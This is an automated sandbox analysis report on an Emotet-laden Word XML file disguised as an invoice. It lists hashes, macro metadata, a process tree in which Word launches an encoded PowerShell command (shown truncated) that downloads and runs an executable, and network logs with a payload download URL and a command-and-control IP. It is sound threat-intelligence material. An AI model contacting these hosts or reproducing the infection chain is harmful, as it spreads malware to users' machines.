File name: | Factura-2019-090005-01-02-2019.doc |
Full analysis: | https://app.any.run/tasks/d6886e6e-0ded-46a1-8750-185a13379300 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | February 18, 2019, 13:23:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 4FB302748C12C77CE2EACF26DCE55A42 |
SHA1: | CDA17A140E0E98047FE34D822238C56D46D1DC67 |
SHA256: | D53F9FD700393C6FEB2C80B82A057B139BDCB99DE6C4BCDDCC718AF502D53701 |
SSDEEP: | 3072:ru2/0IzRJCT8P7Zm4codz/u5iW8EM/FWt:y2/3JdPtiJQ/Fa |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentMacrosPresent: | yes |
---|---|
WordDocumentEmbeddedObjPresent: | no |
WordDocumentOcxPresent: | no |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesCreated: | 2019:02:15 12:35:00Z |
WordDocumentDocumentPropertiesLastSaved: | 2019:02:15 12:35:00Z |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesWords: | 2 |
WordDocumentDocumentPropertiesCharacters: | 12 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 13 |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleRsidVal: | 003B0670 |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentDocSuppDataBinDataName: | l52___32 |
WordDocumentDocSuppDataBinData: | (Binary data 101228 bytes, use -b option to extract) |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsColormruExt: | edit |
WordDocumentShapeDefaultsShapedefaultsColormruColors: | #00aeea |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentBgPictBackgroundBgcolor: | #00AEEA |
WordDocumentDocPrViewVal: | |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrDisplayBackgroundShape: | - |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 00005EB7 |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentBodySectPRsidRDefault: | 00B62094 |
WordDocumentBodySectPRRsidRPr: | 00743F44 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictBinDataName: | wordml://h0_627_.S2097_20.Z695_953 |
WordDocumentBodySectPRPictBinData: | (Binary data, base64-encoded) |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:161.25pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://h0_627_.S2097_20.Z695_953 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRT: | |
WordDocumentBodySectSectPrRsidR: | 00005EB7 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3492 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Factura-2019-090005-01-02-2019.doc.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000 | ||||
3172 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Factura-2019-090005-01-02-2019.doc.xml" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | MSOXMLED.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3364 | powershell -e … | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3720 | "C:\Users\admin\211.exe" | C:\Users\admin\211.exe | — | powershell.exe |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: EFS UI Application Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713- | ||||
2604 | "C:\Users\admin\211.exe" | C:\Users\admin\211.exe | 211.exe | |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: EFS UI Application Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713- | ||||
3508 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | 211.exe | |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: EFS UI Application Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713- | ||||
2752 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: EFS UI Application Version: 6.1.7600.16385 (win7_rtm.090713- |
PID | Process | Filename | Type | |
---|---|---|---|---|
3172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8E6B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70209946.Z695_953 | — | |
MD5:— | SHA256:— | |||
3364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HEK5KKFNX12HXRTQBWUT.temp | — | |
MD5:— | SHA256:— | |||
3364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199a52.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ctura-2019-090005-01-02-2019.doc.xml | pgc | |
MD5:2F39D3E433B30143246B5C86D4BD6FC7 | SHA256:D2DEC28C69BDA910E017366283434F29AA61E3912C1549EEE5DA9195AA99DC34 | |||
3364 | powershell.exe | C:\Users\admin\211.exe | executable | |
MD5:8D3D095610DA17BFC3C799D415072054 | SHA256:E6F0E5F1BADA4C1F17E7310063658831AD30B22F032CF11F39B42D6FC0671324 | |||
3172 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BCA7725C8CB9C8D63EC166E879124B21 | SHA256:05E75A6D04CEFC391DEAF88AFF57A37ECFC5F3AF4F711DC7518EB32A07640D73 | |||
2604 | 211.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:8D3D095610DA17BFC3C799D415072054 | SHA256:E6F0E5F1BADA4C1F17E7310063658831AD30B22F032CF11F39B42D6FC0671324 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2752 | wabmetagen.exe | GET | — | 88.225.226.91:443 | http://88.225.226.91:443/ | TR | — | — | malicious |
3364 | powershell.exe | GET | 200 | 81.56.198.200:80 | http://81.56.198.200/MrMAFWOk9/ | FR | executable | 152 Kb | suspicious |
3364 | powershell.exe | GET | 301 | 81.56.198.200:80 | http://81.56.198.200/MrMAFWOk9 | FR | html | 239 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3364 | powershell.exe | 81.56.198.200:80 | — | Free SAS | FR | suspicious |
2752 | wabmetagen.exe | 88.225.226.91:443 | — | Turk Telekom | TR | malicious |
PID | Process | Class | Message |
---|---|---|---|
3364 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3364 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3364 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
3364 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |